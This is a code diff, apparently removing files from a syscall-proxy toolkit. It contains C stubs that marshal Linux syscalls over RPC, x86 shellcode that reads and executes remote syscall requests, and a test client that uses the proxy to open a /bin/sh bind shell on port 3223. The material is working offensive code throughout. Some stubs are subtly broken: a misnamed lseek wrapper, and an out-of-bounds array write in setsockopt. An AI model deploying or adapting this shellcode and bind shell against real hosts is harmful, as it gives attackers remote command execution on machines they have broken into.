int sys_write(int fd, char *buf, int len)
|
||||
{
|
||||
struct regs r;
|
||||
struct arg *args[1];
|
||||
struct arg arg;
|
||||
|
||||
memset(&r, 0, sizeof(r));
|
||||
r.eax = 4;
|
||||
r.ebx = fd;
|
||||
r.edx = len;
|
||||
/* reference first argument */
|
||||
r.ecx = rpc_reloc(sizeof(r));
|
||||
|
||||
/* buffer argument */
|
||||
arg.len = len;
|
||||
arg.buf = buf;
|
||||
args[0] = &arg;
|
||||
|
||||
return rpc_syscall(&r, args, 1);
|
||||
}
|
||||
|
||||
int sys_open(char *f, int flags, int mode)
|
||||
{
|
||||
struct regs r;
|
||||
struct arg *args[1];
|
||||
struct arg arg;
|
||||
|
||||
memset(&r, 0, sizeof(r));
|
||||
r.eax = 5;
|
||||
r.ebx = rpc_reloc(sizeof(r));
|
||||
r.edx = mode;
|
||||
r.ecx = flags;
|
||||
|
||||
/* buffer argument */
|
||||
arg.len = strlen(f) + 1;
|
||||
arg.buf = f;
|
||||
args[0] = &arg;
|
||||
|
||||
return rpc_syscall(&r, args, 1);
|
||||
}
|
||||
|
||||
int sys_read(int fd, char *b, int len)
|
||||
{
|
||||
struct regs r;
|
||||
struct arg *args[1];
|
||||
struct arg arg;
|
||||
int ret;
|
||||
|
||||
memset(&r, 0, sizeof(r));
|
||||
r.eax = 3;
|
||||
r.ebx = fd;
|
||||
r.ecx = rpc_reloc(sizeof(r));
|
||||
r.edx = len;
|
||||
|
||||
/* buffer argument */
|
||||
arg.len = 0;
|
||||
arg.buf = b;
|
||||
args[0] = &arg;
|
||||
|
||||
ret = rpc_syscall(&r, args, 1);
|
||||
if(ret > 0)
|
||||
memcpy(b, (char *)rpc_data_at(0), ret);
|
||||
|
||||
return ret;
|
||||
}
|
||||
|
||||
int sys_lseek(int af, int f, int proto)
|
||||
{
|
||||
struct regs r;
|
||||
struct arg *args[1];
|
||||
struct arg arg;
|
||||
int sock_args[3];
|
||||
|
||||
memset(&r, 0, sizeof(r));
|
||||
r.eax = 19;
|
||||
r.ebx = 1;
|
||||
r.ecx = rpc_reloc(sizeof(r));
|
||||
|
||||
sock_args[0] = af;
|
||||
sock_args[1] = f;
|
||||
sock_args[2] = proto;
|
||||
|
||||
/* buffer argument */
|
||||
arg.len = 0;
|
||||
arg.buf = NULL;
|
||||
args[0] = &arg;
|
||||
|
||||
return rpc_syscall(&r, args, 1);
|
||||
}
|
||||
|
||||
int sys_socket(int af, int f, int proto)
|
||||
{
|
||||
struct regs r;
|
||||
struct arg *args[1];
|
||||
struct arg arg;
|
||||
int sock_args[3];
|
||||
|
||||
memset(&r, 0, sizeof(r));
|
||||
r.eax = 0x66;
|
||||
r.ebx = 1;
|
||||
r.ecx = rpc_reloc(sizeof(r));
|
||||
|
||||
sock_args[0] = af;
|
||||
sock_args[1] = f;
|
||||
sock_args[2] = proto;
|
||||
|
||||
/* buffer argument */
|
||||
arg.len = sizeof(sock_args);
|
||||
arg.buf = (char *)sock_args;
|
||||
args[0] = &arg;
|
||||
|
||||
return rpc_syscall(&r, args, 1);
|
||||
}
|
||||
|
||||
int sys_bind(int s, char *b, int len)
|
||||
{
|
||||
struct regs r;
|
||||
struct arg *args[2];
|
||||
struct arg arg[2];
|
||||
int sock_args[3];
|
||||
|
||||
memset(&r, 0, sizeof(r));
|
||||
r.eax = 0x66;
|
||||
r.ebx = 2;
|
||||
r.ecx = rpc_reloc(sizeof(r));
|
||||
|
||||
sock_args[0] = s;
|
||||
sock_args[1] = rpc_reloc(sizeof(r) + sizeof(sock_args));
|
||||
sock_args[2] = len;
|
||||
|
||||
/* buffer argument */
|
||||
arg[0].len = sizeof(sock_args);
|
||||
arg[0].buf = (char *)sock_args;
|
||||
args[0] = &arg[0];
|
||||
|
||||
/* buffer argument */
|
||||
arg[1].len = len;
|
||||
arg[1].buf = b;
|
||||
args[1] = &arg[1];
|
||||
|
||||
return rpc_syscall(&r, args, 2);
|
||||
}
|
||||
|
||||
int sys_setsockopt(int s, int l, int optn, char *optval, int optlen)
|
||||
{
|
||||
struct regs r;
|
||||
struct arg *args[1];
|
||||
struct arg arg[1];
|
||||
int sock_args[5];
|
||||
|
||||
memset(&r, 0, sizeof(r));
|
||||
r.eax = 0x66;
|
||||
r.ebx = 0xe;
|
||||
r.ecx = rpc_reloc(sizeof(r));
|
||||
|
||||
sock_args[0] = s;
|
||||
sock_args[1] = l;
|
||||
sock_args[2] = optn;
|
||||
sock_args[3] = (int)rpc_reloc(sizeof(r) + sizeof(sock_args));
|
||||
sock_args[4] = optlen;
|
||||
|
||||
arg[0].len = sizeof(sock_args);
|
||||
arg[0].buf = (char *)sock_args;
|
||||
args[0] = &arg[0];
|
||||
|
||||
arg[1].len = optlen;
|
||||
arg[1].buf = optval;
|
||||
args[1] = &arg[1];
|
||||
|
||||
return rpc_syscall(&r, args, 2);
|
||||
}
|
||||
|
||||
int sys_listen(int s, int b)
|
||||
{
|
||||
struct regs r;
|
||||
struct arg *args[1];
|
||||
struct arg arg;
|
||||
int sock_args[2];
|
||||
|
||||
memset(&r, 0, sizeof(r));
|
||||
r.eax = 0x66;
|
||||
r.ebx = 4;
|
||||
r.ecx = rpc_reloc(sizeof(r));
|
||||
|
||||
sock_args[0] = s;
|
||||
sock_args[1] = b;
|
||||
|
||||
/* buffer argument */
|
||||
arg.len = sizeof(sock_args);
|
||||
arg.buf = (char *)sock_args;
|
||||
args[0] = &arg;
|
||||
|
||||
return rpc_syscall(&r, args, 1);
|
||||
}
|
||||
|
||||
int sys_accept(int s, char *b, int *len)
|
||||
{
|
||||
struct regs r;
|
||||
struct arg *args[3];
|
||||
struct arg arg[3];
|
||||
int sock_args[3];
|
||||
|
||||
memset(&r, 0, sizeof(r));
|
||||
r.eax = 0x66;
|
||||
r.ebx = 5;
|
||||
r.ecx = rpc_reloc(sizeof(r));
|
||||
|
||||
sock_args[0] = s;
|
||||
sock_args[1] = rpc_reloc(sizeof(r) + sizeof(sock_args));
|
||||
sock_args[2] = rpc_reloc(sizeof(r) + sizeof(sock_args) + *len);
|
||||
|
||||
/* buffer argument */
|
||||
arg[0].len = sizeof(sock_args);
|
||||
arg[0].buf = (char *)sock_args;
|
||||
args[0] = &arg[0];
|
||||
|
||||
/* buffer argument */
|
||||
arg[1].len = *len;
|
||||
arg[1].buf = b;
|
||||
args[1] = &arg[1];
|
||||
|
||||
/* buffer argument */
|
||||
arg[2].len = sizeof(*len);
|
||||
arg[2].buf = (char *)len;
|
||||
args[2] = &arg[2];
|
||||
|
||||
return rpc_syscall(&r, args, 3);
|
||||
|
||||
}
|
||||
|
||||
int sys_execve(char *f, char **argv, char **env)
|
||||
{
|
||||
struct regs r;
|
||||
struct arg **args;
|
||||
struct arg *arg;
|
||||
int n_args = 1;
|
||||
int file_len = strlen(f) + 1;
|
||||
char **args_p = NULL;
|
||||
char **env_p = NULL;
|
||||
int args_len = 0, env_len = 0;
|
||||
int off;
|
||||
int i, ret;
|
||||
|
||||
memset(&r, 0, sizeof(r));
|
||||
r.eax = 0xb;
|
||||
|
||||
/* filename */
|
||||
r.ebx = rpc_reloc(sizeof(r));
|
||||
|
||||
/* arguments */
|
||||
r.ecx = rpc_reloc(sizeof(r) + file_len);
|
||||
|
||||
/* get length of arguments array */
|
||||
if(argv) {
|
||||
for(; argv[args_len] != NULL; args_len++)
|
||||
;
|
||||
/* arguments */
|
||||
r.ecx = rpc_reloc(sizeof(r) + file_len);
|
||||
args_len++;
|
||||
} else {
|
||||
/* arguments */
|
||||
r.ecx = 0;
|
||||
}
|
||||
|
||||
/* get length of environments array */
|
||||
if(env) {
|
||||
for(; env[env_len] != NULL; env_len++)
|
||||
;
|
||||
/* environment */
|
||||
r.edx = rpc_reloc(sizeof(r) + file_len + sizeof(char *) \
|
||||
* args_len);
|
||||
env_len++;
|
||||
} else {
|
||||
/* environment */
|
||||
r.edx = 0;
|
||||
}
|
||||
|
||||
args = (struct arg **)malloc(sizeof(struct arg *) * \
|
||||
(args_len + env_len + 1));
|
||||
|
||||
if(args == NULL)
|
||||
return -ENOMEM;
|
||||
|
||||
arg = (struct arg *)malloc(sizeof(struct arg) * \
|
||||
(args_len + env_len + 1));
|
||||
|
||||
if(arg == NULL)
|
||||
goto err_exec;
|
||||
|
||||
/* buffer argument */
|
||||
arg[0].len = file_len;
|
||||
arg[0].buf = f;
|
||||
args[0] = &arg[0];
|
||||
|
||||
if(args_len) {
|
||||
/* arguments array */
|
||||
args_p = (char **)malloc((args_len + 1) * sizeof(char *));
|
||||
if(args_p == NULL)
|
||||
goto err_exec;
|
||||
|
||||
args_p[args_len] = 0;
|
||||
|
||||
arg[n_args].len = args_len * sizeof(char *);
|
||||
arg[n_args].buf = (char *)args_p;
|
||||
args[n_args] = &arg[n_args];
|
||||
|
||||
n_args++;
|
||||
}
|
||||
|
||||
if(env_len) {
|
||||
/* environment array */
|
||||
env_p = (char **)malloc((env_len + 1) * sizeof(char *));
|
||||
if(env_p == NULL)
|
||||
goto err_exec;
|
||||
|
||||
env_p[env_len] = 0;
|
||||
|
||||
arg[n_args].len = env_len * sizeof(char *);
|
||||
arg[n_args].buf = (char *)env_p;
|
||||
args[n_args] = &arg[n_args];
|
||||
|
||||
n_args++;
|
||||
}
|
||||
|
||||
off = sizeof(r) + file_len + (args_len) * sizeof(char *) + \
|
||||
(env_len) * sizeof(char *);
|
||||
|
||||
/* arguments */
|
||||
for(i = 0; i < args_len - 1; i++, n_args++) {
|
||||
arg[n_args].len = strlen(argv[i]) + 1;
|
||||
arg[n_args].buf = argv[i];
|
||||
args[n_args] = &arg[n_args];
|
||||
args_p[i] = (char *)rpc_reloc(off);
|
||||
off += arg[n_args].len;
|
||||
}
|
||||
|
||||
/* environment */
|
||||
for(i = 0; i < env_len - 1; i++, n_args++) {
|
||||
arg[n_args].len = strlen(env[i]) + 1;
|
||||
arg[n_args].buf = env[i];
|
||||
args[n_args] = &arg[n_args];
|
||||
env_p[i] = (char *)rpc_reloc(off);
|
||||
off += arg[n_args].len;
|
||||
}
|
||||
|
||||
ret = rpc_syscall(&r, args, n_args);
|
||||
|
||||
err_exec:
|
||||
|
||||
free(args);
|
||||
if(arg)
|
||||
free(arg);
|
||||
|
||||
if(env_p)
|
||||
free(env_p);
|
||||
|
||||
if(args_p)
|
||||
free(args_p);
|
||||
|
||||
return ret;
|
||||
}
|
||||
|
||||
int sys_dup2(int o, int n)
|
||||
{
|
||||
struct regs r;
|
||||
|
||||
memset(&r, 0, sizeof(r));
|
||||
r.eax = 0x3f;
|
||||
r.ebx = o;
|
||||
r.ecx = n;
|
||||
|
||||
return rpc_syscall(&r, NULL, 0);
|
||||
}
|
||||
|
||||
int sys_close(int d)
|
||||
{
|
||||
struct regs r;
|
||||
|
||||
memset(&r, 0, sizeof(r));
|
||||
r.eax = 6;
|
||||
r.ebx = d;
|
||||
|
||||
return rpc_syscall(&r, NULL, 0);
|
||||
}
|
||||
|
|
@ -1,67 +0,0 @@
|
|||
.code32
|
||||
.global process_syscall, len_shcode
|
||||
|
||||
# th0rpe - 08-27-2007
|
||||
|
||||
process_syscall:
|
||||
|
||||
#ifdef LISTENER_TCP
|
||||
#include "listeners/lis_socket_tcp.S"
|
||||
#else
|
||||
/* for testing you must compile with 'test_srv.c' */
|
||||
#include "listeners/getsock.S"
|
||||
#endif
|
||||
|
||||
# save connection descriptor
|
||||
pushl %ebx
|
||||
|
||||
# alloc space for syscalls packet
|
||||
subl $2048, %esp
|
||||
|
||||
# write buffer address
|
||||
write_buffer:
|
||||
movl %esp, %ecx
|
||||
|
||||
movl %esp, (%ecx)
|
||||
movl $4, %edx
|
||||
movl %edx, %eax
|
||||
int $0x80
|
||||
|
||||
read_request:
|
||||
# read request
|
||||
movl %esp, %ecx
|
||||
movl $2048, %edx
|
||||
movl $3, %eax
|
||||
int $0x80
|
||||
|
||||
# check minimal length
|
||||
cmpl $32,%eax
|
||||
jl err_process
|
||||
|
||||
# exec syscall
|
||||
popal
|
||||
exec_syscall:
|
||||
int $0x80
|
||||
|
||||
# restore stack pointer
|
||||
subl $32, %esp
|
||||
|
||||
# save eax result
|
||||
movl %eax, 28(%esp)
|
||||
|
||||
# write response
|
||||
movl %esp, %ecx
|
||||
movl $2048, %edx
|
||||
# restore ebx register with connecion descriptor
|
||||
movl 2048(%esp), %ebx
|
||||
movl $4, %eax
|
||||
int $0x80
|
||||
|
||||
jmp read_request
|
||||
|
||||
err_process:
|
||||
movl $0xfc,%eax
|
||||
int $0x80
|
||||
|
||||
len_shcode:
|
||||
.long len_shcode - process_syscall
|
||||
|
|
@ -1,5 +0,0 @@
|
|||
/* Hacky way to bypass make(1) and waf(X) build */
|
||||
#ifndef MKPFX
|
||||
#define MKPFX ""
|
||||
#endif
|
||||
asm(".include \""MKPFX"../src/rasc/syscall.S\"");
|
||||
|
|
@ -1,45 +0,0 @@
|
|||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <string.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <errno.h>
|
||||
#include "sp.h"
|
||||
|
||||
#include <sys/types.h>
|
||||
#include <sys/stat.h>
|
||||
#include <fcntl.h>
|
||||
|
||||
#define RPC_HOST "127.0.0.1"
|
||||
#define RPC_PORT 8181
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
int fd, l, con, opt = 1;
|
||||
struct sockaddr_in in, in1;
|
||||
char *arg[] = {"/bin/sh", 0};
|
||||
|
||||
l = sizeof(in1);
|
||||
|
||||
memset(&in, 0, sizeof(in));
|
||||
in.sin_port = htons(3223);
|
||||
in.sin_family = AF_INET;
|
||||
|
||||
rpc_init(RPC_HOST, RPC_PORT);
|
||||
|
||||
fd = sys_socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
||||
printf("socket: %i\n", fd);
|
||||
printf("setsockopt: %i\n", setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, \
|
||||
&opt, sizeof(opt)));
|
||||
printf("bind: %i\n", sys_bind(fd, &in, sizeof(in)));
|
||||
printf("listen: %i\n", sys_listen(fd, 5));
|
||||
con = sys_accept(fd, &in1, &l);
|
||||
printf("accept: %i\n", con);
|
||||
printf("dup2: %i\n", sys_dup2(con, 0));
|
||||
printf("dup2: %i\n", sys_dup2(con, 1));
|
||||
printf("dup2: %i\n", sys_dup2(con, 2));
|
||||
sys_execve(arg[0], arg, 0);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
|
@ -1,67 +0,0 @@
|
|||
#include <stdio.h>
|
||||
#include <netinet/in.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
|
||||
#define SRV_PORT 8181
|
||||
|
||||
/* test with getsockname() shellcode */
|
||||
|
||||
extern void process_syscall();
|
||||
|
||||
void init_srv_sp()
|
||||
{
|
||||
struct sockaddr_in in, l;
|
||||
int srv;
|
||||
int con;
|
||||
int len;
|
||||
int opt;
|
||||
int t;
|
||||
|
||||
memset(&in, 0, sizeof(in));
|
||||
in.sin_port = htons(SRV_PORT);
|
||||
in.sin_family = AF_INET;
|
||||
|
||||
srv = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
|
||||
if(srv < 0) {
|
||||
perror("socket");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
opt = 1;
|
||||
if(setsockopt(srv, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt)) < 0) {
|
||||
perror("setsockopt");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
|
||||
len = sizeof(in);
|
||||
if(bind(srv, (struct sockaddr *)&in, sizeof(in)) < 0) {
|
||||
perror("bind");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
listen(srv, 5);
|
||||
while((con = accept(srv, (struct sockaddr *)&in,
|
||||
&len)) > 0) {
|
||||
int pid;
|
||||
|
||||
pid = fork();
|
||||
if(pid == 0) {
|
||||
close(srv);
|
||||
printf("con: %i\n", con);
|
||||
process_syscall();
|
||||
} else {
|
||||
close(con);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
printf("Esperant conexions rpc al port 8181\n");
|
||||
init_srv_sp();
|
||||
return 0;
|
||||
}
|
||||
|
|
@ -1,11 +0,0 @@
|
|||
/* test with server socket shellcode */
|
||||
#include <stdio.h>
|
||||
|
||||
extern void process_syscall();
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
printf("Esperant rpc al port 8181...\n");
|
||||
process_syscall();
|
||||
return 0;
|
||||
}
|
||||
Loading…
Reference in New Issue